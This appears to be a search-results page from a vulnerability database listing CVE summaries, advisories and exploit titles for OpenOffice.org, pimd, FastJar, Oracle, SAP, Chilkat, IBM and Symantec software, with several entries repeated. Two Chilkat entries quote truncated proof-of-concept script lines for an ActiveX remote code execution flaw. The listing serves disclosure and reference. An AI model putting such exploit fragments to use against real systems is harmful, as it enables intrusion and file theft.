6871 matches found
CVE-2010-3450
Multiple directory traversal vulnerabilities in OpenOffice.org OOo 2.x and 3.x before 3.3 allow remote attackers to overwrite arbitrary files via a .. dot dot in an entry in 1 an XSLT JAR filter description file, 2 an Extension aka OXT file, or unspecified other 3 JAR or 4 ZIP files...
OpenOffice.org: directory traversal flaws in handling of XSLT jar filter descriptions and OXT extension files
Multiple directory traversal vulnerabilities in OpenOffice.org OOo 2.x and 3.x before 3.3 allow remote attackers to overwrite arbitrary files via a .. dot dot in an entry in 1 an XSLT JAR filter description file, 2 an Extension aka OXT file, or unspecified other 3 JAR or 4 ZIP files...
OpenOffice.org: directory traversal flaws in handling of XSLT jar filter descriptions and OXT extension files
Multiple directory traversal vulnerabilities in OpenOffice.org OOo 2.x and 3.x before 3.3 allow remote attackers to overwrite arbitrary files via a .. dot dot in an entry in 1 an XSLT JAR filter description file, 2 an Extension aka OXT file, or unspecified other 3 JAR or 4 ZIP files...
Debian DSA-2151-1 : openoffice.org - several vulnerabilities
Several security related problems have been discovered in the OpenOffice.org package that allows malformed documents to trick the system into crashes or even the execution of arbitrary code. - CVE-2010-3450 During an internal security audit within Red Hat, a directory traversal vulnerability has...
Oracle Document Capture 10.1.3.5 - Insecure Method Buffer Overflow
Oracle Document Capture 10.1.3.5 - Insecure Method Buffer Overflow Source: http://packetstormsecurity.org/files/view/97871/DSECRG-11-006.txt ActiveX components contain insecure methods. Digital Security Research Group DSecRG Advisory DSECRG-11-006 internal DSECRG-09-066 Application: Oracle Docume...
Oracle Document Capture 10.1.3.5 Insecure Method / Buffer Overflow
Exploit for windows platform in category remote exploits Application: Oracle Document Capture Versions Affected: Oracle Document Capture 10.1.3.5 Vendor URL: http://oracle.com Bugs: Insecure method. Buffer overflow. Exploits: YES Reported: 14.12.2009 Vendor response: 15.12.2009 Date of Public...
[DSECRG-00143] SAP Crystal Reports 2008 - ActiveX insecure methods
DSECRG-11-002 Internal DSECRG-00143 SAP Crystal Report Server 2008 scriptinghelpers.dll ActiveX component - Insecure methods The component contains insecure methods by which you can overwrite any file in the OS, run the executable file, kill process, delete the file. Application: SAP Crystal Repo...
[DSECRG-11-006] Oracle Document Capture ActiveX - Insecure method, buffer overflow
ActiveX components contain insecure methods. Digital Security Research Group DSecRG Advisory DSECRG-11-006 internal DSECRG-09-066 Application: Oracle Document Capture Versions Affected: Oracle Document Capture 10.1.3.5 Vendor URL: http://oracle.com Bugs: Insecure method. Buffer overflow. Exploits...
Code injection
The configure script in gnash 0.8.8 allows local users to overwrite arbitrary files via a symlink attack on the 1 /tmp/gnash-configure-errors.$$, 2 /tmp/gnash-configure-warnings.$$, or 3 /tmp/gnash-configure-recommended.$$ files...
fastjar: directory traversal vulnerabilities
Directory traversal vulnerability in the extractjar function in jartool.c in FastJar 0.98 allows remote attackers to create or overwrite arbitrary files via a .. dot dot in a non-initial pathname component in a filename within a .jar archive, a related issue to CVE-2005-1080. NOTE: this...
CVE-2011-0007
pimd 2.1.5 and possibly earlier versions allows user-assisted local users to overwrite arbitrary files via a symlink attack on 1 pimd.dump when a USR1 signal is sent, or 2 pimd.cache when USR2 is sent...
CVE-2011-0007
pimd 2.1.5 and possibly earlier versions allows user-assisted local users to overwrite arbitrary files via a symlink attack on 1 pimd.dump when a USR1 signal is sent, or 2 pimd.cache when USR2 is sent...
Code injection
pimd 2.1.5 and possibly earlier versions allows user-assisted local users to overwrite arbitrary files via a symlink attack on 1 pimd.dump when a USR1 signal is sent, or 2 pimd.cache when USR2 is sent...
CVE-2011-0007
pimd 2.1.5 and possibly earlier versions allows user-assisted local users to overwrite arbitrary files via a symlink attack on 1 pimd.dump when a USR1 signal is sent, or 2 pimd.cache when USR2 is sent...
CVE-2011-0007
CVE-2011-0007 affects pimd, specifically version 2.1.5 and possibly earlier. The flaw allows local, user-assisted attackers to overwrite arbitrary files via a symlink attack on pimd.dump (triggered by USR1) or pimd.cache (triggered by USR2). Debian’s DSA-2147-1 notes a fix in pimd 2.1.0-alpha29.1...
Chilkat Software FTP2 ActiveX Component (ChilkatFtp2.DLL 2.6.1.1) Remote Code Execution poc
!-- Chilkat Software FTP2 ActiveX Component ChilkatFtp2.DLL 2.6.1.1 Remote Code Execution poc by rgod tested against Internet Explorer 7 on Vista should also work with 8/9 ActiveX Settings: CLSID: 302124C4-30A0-484A-9C7A-B51D5BA5306B Progid: ChilkatFtp2.ChilkatFtp2.1 Binary Path:...
Chilkat Software FTP2 - ActiveX Component Remote Code Execution
obj.UnlockComponent"suntzu"; //needed for file transfer operations, type whatever here obj.Port=21; //configure ftp connection obj.Hostname="192.168.0.1"; //change here obj.ConnectTimeout=5; obj.Passive=1; var x; x=obj.Connect; if x==1 x = obj.GetFile"suntzu.txt","c:/Users/All...
Chilkat Software FTP2 ActiveX Code Execution
obj.UnlockComponent"suntzu"; //needed for file transfer operations, type whatever here obj.Port=21; //configure ftp connection obj.Hostname="192.168.0.1"; //change here obj.ConnectTimeout=5; obj.Passive=1; var x; x=obj.Connect; if x==1 x = obj.GetFile"suntzu.txt","c:/Users/All...
PT-2010-5571 · Ibm · Ibm Tivoli Storage Manager
Name of the Vulnerable Software and Affected Versions: IBM Tivoli Storage Manager versions 5.3.x through 5.3.6.9 IBM Tivoli Storage Manager versions 5.4.x through 5.4.3.3 IBM Tivoli Storage Manager versions 5.5.x through 5.5.2 IBM Tivoli Storage Manager versions 6.1.x through 6.1.3 IBM Tivoli...
Symantec Endpoint Protection File Overwrite
SUMMARY Symantec Endpoint Protection SEP Manager reporting module allows a php file overwrite from an authorized client that could potentially allow execution of arbitrary code on the server-side. AFFECTED PRODUCTS Product | Version | Solution ---|---|--- Symantec Endpoint Protection | 11.x |...